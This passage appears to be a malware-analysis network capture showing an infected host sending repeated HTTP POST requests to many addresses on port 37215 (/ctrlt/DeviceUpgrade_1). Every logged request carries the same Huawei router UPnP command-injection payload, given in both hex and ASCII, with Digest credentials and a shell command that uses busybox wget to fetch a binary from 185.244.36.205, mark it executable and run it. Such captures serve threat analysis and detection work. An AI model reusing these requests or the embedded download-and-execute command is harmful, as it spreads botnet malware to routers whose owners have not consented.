                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              72192.168.2.1554586186.82.113.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034344912 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              73192.168.2.1545856156.24.100.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034344912 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              74192.168.2.1544678197.205.36.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034344912 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              75192.168.2.1558778122.103.109.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034419060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              76192.168.2.1537682156.199.184.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034509897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              77192.168.2.154853437.122.99.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034514904 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              78192.168.2.1558000186.21.14.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034514904 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              79192.168.2.1545822197.47.196.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034519911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              80192.168.2.1552136197.163.252.9237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034537077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              81192.168.2.1533022222.116.65.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034538031 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
